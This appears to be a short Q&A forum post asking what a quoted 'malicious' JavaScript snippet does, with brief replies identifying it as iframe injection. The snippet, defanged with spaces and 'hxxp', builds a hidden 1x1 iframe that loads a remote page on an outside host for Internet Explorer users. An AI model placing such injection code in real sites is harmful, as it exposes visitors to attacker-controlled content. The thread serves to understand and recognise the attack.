# What does this "malicious" JavaScript code do?

Tags: javascript

I found this code on a site which stated is was "malicious" javascript code. Seeing that i'm not very familiar with javascript and i don't think trying the code on my site to find out is a good idea, i was wondering if someone on here does know. Its the following code:

```
function MakeFrame(){
element = do cument.get ElementById('yahoo_api');
if (!element){
var el = do cument.cr eateElement('if rame');
do cument.body.append Child(el);
el.id = 'yahoo_api';
el.style.width = '1px';
el.style.height = '1px';
el.style.display = 'none';
el.src = 'hxxp:// juyfdjhdjdgh .nl .ai /showthread.php?t=72241732'
}
}
var ua navigator.userAgent.toLowerCase();
if(((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){
var t - setTimeout("makeFrameEx()", 1000)
}
```

[image]

Thanks!

Comment: See http://blog.unmaskparasites.com/2011/11/09/tmpwp_inc-or-not-your-typical-wordpress-attack/

Comment: @TwoStraws Damn doesn't look good 0o, Thanks though bruv!

Answer (score 2):

it's malicious for a simple reason: injecting iframe into the page. if you want to know more just try "iframe virus".